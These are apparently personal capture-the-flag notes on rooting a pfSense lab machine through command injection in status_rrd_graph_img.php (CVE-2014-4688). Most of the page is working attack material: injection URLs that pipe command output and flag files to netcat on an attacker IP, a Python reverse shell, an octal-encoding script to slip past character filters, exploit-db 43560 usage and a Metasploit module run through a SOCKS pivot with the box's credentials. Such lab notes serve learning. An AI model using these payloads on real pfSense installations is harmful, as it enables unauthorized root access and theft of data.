PFSense

Exec Code Exploit

  • google: pfsense cve

    • cvedetails.com

      • bright red ones for 'pfsense'

      • 'exec code' as indicator

    • Use: CVE-2014-4688 (only 6.5 score)

    • exploitdb: 43560 ..interesting

  • google: pfsense 2.1.3 changelog

    • Found: Nov 11, 2014 New Features

  • google: pfsense exploits ..find good blogpost

    • proteansec - pt4: directory traversal

    • proteansec - pt2: command injection

    • status_rrd_graph_img.php ..still unpatched, we will use

  • REF: ReverseShell, LFI, CharEvasion

Mixed Results

  • Had trouble following these examples from ippsec

pfsense > status > RRD Graphs

Cleanup the link:
https://$IP/status_rrd.graph_img.php?database=system-processor.rrd
https://$IP/status_rrd.graph_img.php?database=queues               ..from exploit/blog
https://$IP/status_rrd.graph_img.php?database=queues;sleep+10      ..worked!
https://$IP/status_rrd.graph_img.php?database=queues;echo+ippsec   ..ugly results
https://$IP/status_rrd.graph_img.php?database=queues;echo+ippsec|nc+10.10.14.6+9000
.. queues;echo+whoami|nc+10.10.14.6+9000    .. root
.. queues;echo+hostname|nc+10.10.14.6+9000  .. pfSense
nc -nvlp 9001

------------------------------
More:
.. queues;echo+abc|nc+10.10.14.6+9000    ..works
.. queues;find+/|nc+10.10.14.6+9000      ..fail ...find data in slash
.. queues;find+.|nc+10.10.14.6+9000      ..ok
nc -lvnp 9001 > filesystem.txt           ..catch

.. queues;echo+abc|nc+10.10.14.6+9000    ..ok
.. queues;echo+abc/|nc+10.10.14.6+9000   ..fails (slash blocked)
.. queues;env|nc+10.10.14.6+9000    ..get environment HOME=/

.. queues;echo+$(HOME)|nc+10.10.14.6+9000    ..get environment HOME=/
.. queues;FIND+$(HOME)|nc+10.10.14.6+9000    ..FIND /  ..NOW WORKS
.. queues;cat+$(HOME)home$(HOME)rohit$(HOME)user.txt|nc+10.10.14.6+9001

nc -lvnp 9001 > filesystem.txt      
grep root.txt filesystem.txt

------------------------------
reverse
Python Reverse Shell

vim cmd  ..connect(("10.10.14.6",1234))
nc -nvlp 9001 < cmd   ..send/share the file
nc -nvlp 1234         ..catch shell
..queues;nc+10.10.10.6+9001|python+&   ..fail
..queues;nc+10.10.10.6+9001|python     ..ok pull file, python execute
connected!

gobuster - 45 minutes

> gobuster dir -w medium.txt dir -u https://10.x.x.x -k -x php,txt,conf,bak
/system-users.txt  ..found username!!!

More Injections

https://10.x.x.x/status_rrd_graph_img.php?database=queues;cd+..;cd+..;cd+..;cd+usr;cd+local;cd+www;id%3Ecmd.txt
https://10.x.x.x/cmd.txt  ..view results

https://10.x.x.x/status_rrd_graph_img.php?database=-throughput.rrd&graph=file|command|echo%20
https://10.x.x.x/status_rrd_graph_img.php?database=-throughput.rrd&graph=file|printf%20OCTET_ENCODED_SHELLCODE|sh|echo%20

Octal Code to Injection

  • If Dashes and Slashes are Blocked

  • Use Octal Encoding

#!/usr/bin/env python3
command = "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('10.10.14.10',443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(['/bin/sh','-i']);'"
payload = ""
for char in command:
	payload += ("\\" + oct(ord(char)).lstrip("0o"))
print(payload)


---------------------
Result: 
\160\171\164\150\...

Verify:
printf '\160\171\164\150\...'
python -c 'import socket... worked!


---------------------
Octal Injection!
https://10.x.x.x/status_rrd_graph_img.php?database=queues;printf+%27\160\171\164\150\...%27|sh

Easy Exploit

searchsploit -m php/webapps/43560.py
exploit-db 43560 > python command injection script
python3 43560.py --rhost 10.x.x.x --lhost 10.x.x.x --lport 4444 --username rohit --password pfsense
nc -nvlp 4444
whoami ..root

Metasploit

  • Plus Socks pivot from another box (since we were banned)

service postgresql start 
msfconsole
search pfsense 
graph injection
locate pfsense_graph

use exploit/unix/http/pfsense_graph_injection_exec
set RHOST $IP
set USERNAME rohit
set PASSWORD pfsense
set LHOST tun0
set Proxies socks5:127.0.0.1:1080
set ReverseAllowProxy true
exploit
m> shell
m> hostname

Advanced

PreviousNagiosNextphp

Last updated